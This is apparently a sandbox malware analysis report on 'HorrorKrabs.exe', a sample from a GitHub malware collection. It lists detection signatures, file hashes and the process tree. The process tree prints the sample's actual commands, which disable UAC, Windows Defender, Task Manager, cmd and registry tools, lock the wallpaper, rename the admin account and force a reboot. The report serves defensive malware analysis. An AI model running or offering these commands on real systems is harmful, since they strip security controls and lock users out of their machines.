Overview

overview

10

Static

static

1

URLScan

urlscan

https://github.com/p...

windows10-2004-x64

Analysis

  • max time kernel
    44s
  • max time network
    45s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/08/2024, 13:38

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    https://github.com/pankoza2-pl/malwaredatabase-old

Score
10/10
discoveryevasionransomwaretrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Disables RegEdit via registry modification 2 IoCs
    evasion
  • Disables Task Manager via registry modification
    evasion
  • Disables cmd.exe use via registry modification 2 IoCs
    evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Windows directory 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry key 1 TTPs 5 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old
    1⤵
      PID:2120
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4944,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:1
      1⤵
        PID:4836
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4104,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4416 /prefetch:1
        1⤵
          PID:4788
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5416,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=5472 /prefetch:8
          1⤵
            PID:2372
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5432,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=5500 /prefetch:8
            1⤵
              PID:4800
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=5928,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=5888 /prefetch:8
              1⤵
                PID:4340
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --field-trial-handle=6224,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=6344 /prefetch:8
                1⤵
                  PID:2488
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=6296,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:1
                  1⤵
                    PID:3916
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --field-trial-handle=6188,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=6652 /prefetch:8
                    1⤵
                      PID:4424
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=7028,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=7040 /prefetch:8
                      1⤵
                        PID:2412
                      • C:\Windows\System32\rundll32.exe
                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                        1⤵
                          PID:3288
                        • C:\Users\Admin\AppData\Local\Temp\Temp1_HorrorKrabs.zip\HorrorKrabs.exe
                          "C:\Users\Admin\AppData\Local\Temp\Temp1_HorrorKrabs.zip\HorrorKrabs.exe"
                          1⤵
                          • Disables RegEdit via registry modification
                          • Disables cmd.exe use via registry modification
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:1320
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\krabsetup.bat" "
                            2⤵
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4384
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\windows\update32\bg.bmp /f
                              3⤵
                              • Sets desktop wallpaper using registry
                              • System Location Discovery: System Language Discovery
                              PID:3844
                            • C:\Windows\SysWOW64\rundll32.exe
                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2044
                            • C:\Windows\SysWOW64\reg.exe
                              reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:4692
                            • C:\Windows\SysWOW64\reg.exe
                              reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                              3⤵
                              • UAC bypass
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:2408
                            • C:\Windows\SysWOW64\reg.exe
                              Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2088
                            • C:\Windows\SysWOW64\reg.exe
                              REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:3884
                            • C:\Windows\SysWOW64\net.exe
                              net user Admin /fullname:"MR KRABS WAS HERE!"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:4640
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 user Admin /fullname:"MR KRABS WAS HERE!"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3476
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1128
                            • C:\Windows\SysWOW64\reg.exe
                              REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f
                              3⤵
                              • Disables cmd.exe use via registry modification
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:2712
                            • C:\Windows\SysWOW64\reg.exe
                              REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                              3⤵
                              • Disables RegEdit via registry modification
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:4368
                            • C:\Windows\SysWOW64\shutdown.exe
                              shutdown /r /t 00
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1516
                        • C:\Windows\system32\LogonUI.exe
                          "LogonUI.exe" /flags:0x4 /state0:0xa38c3055 /state1:0x41c64e6d
                          1⤵
                          • Modifies data under HKEY_USERS
                          • Suspicious use of SetWindowsHookEx
                          PID:2152

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Temp\bg.bmp
                          Filesize

                          11.7MB

                          MD5

                          009b9f7e5b7b45674e6de11dfbc5873d

                          SHA1

                          fc848c11b0eb1c48b6e49e59bfb2df069ccf7756

                          SHA256

                          5b40b1922ac983f07ecc3e444813734aa03ce3270b7e5c0dc93610e34ed58de7

                          SHA512

                          cfe2087b0711a5d7ce486f338c49d5c6147b3c931f13b3ba27628200f26c3a9776de91a1cabd7bfd274a08fbe7b8a4f9ec172e4f7cfbf3234c8aa35399d03549

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\krabsetup.bat
                          Filesize

                          1KB

                          MD5

                          7f5a110ccd8737cebf3f52b49424eecc

                          SHA1

                          67a0a8ef8745e20b1cc100a2ab95cde32ad7959a

                          SHA256

                          2ae0d42a78a32d4f8f81060cbe29b95eff8a90031690d2b7cc70d540a6110d03

                          SHA512

                          68d4d79c3007b50dcbd783f6e3020b8e640613c79943c8cf82456dcb7892baf0466b4f2dba4a3b9da6240cb305acdb3c9000f7b80bf63649ade767d8963476c4

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\krabslol.exe
                          Filesize

                          19.3MB

                          MD5

                          e1a919b2c68ec9e615b390adb8064bf0

                          SHA1

                          a0cab57b6bdbe2dcb888ea07fe4ed161916f6398

                          SHA256

                          6166b3e0ec7478ac54b33edaf001fb2421f15a559bcc0f37f09c08a4e466fda8

                          SHA512

                          3e837cd486806d63516488b2ac0a514e2e03bf3d7c511a7aa6c532c0569580cfbe81311d57b4a3621ee151806994e0935cf2528fadfe275a8a9a3242610a4279

                          Download Submit

                        • memory/1320-0-0x000000007525E000-0x000000007525F000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1320-1-0x00000000000F0000-0x0000000002018000-memory.dmp

                          Filesize

                          31.2MB

                          Download

                        • memory/1320-2-0x00000000068A0000-0x000000000693C000-memory.dmp

                          Filesize

                          624KB

                          Download

                        • memory/1320-3-0x00000000073C0000-0x0000000007964000-memory.dmp

                          Filesize

                          5.6MB

                          Download

                        • memory/1320-4-0x0000000006EB0000-0x0000000006F42000-memory.dmp

                          Filesize

                          584KB

                          Download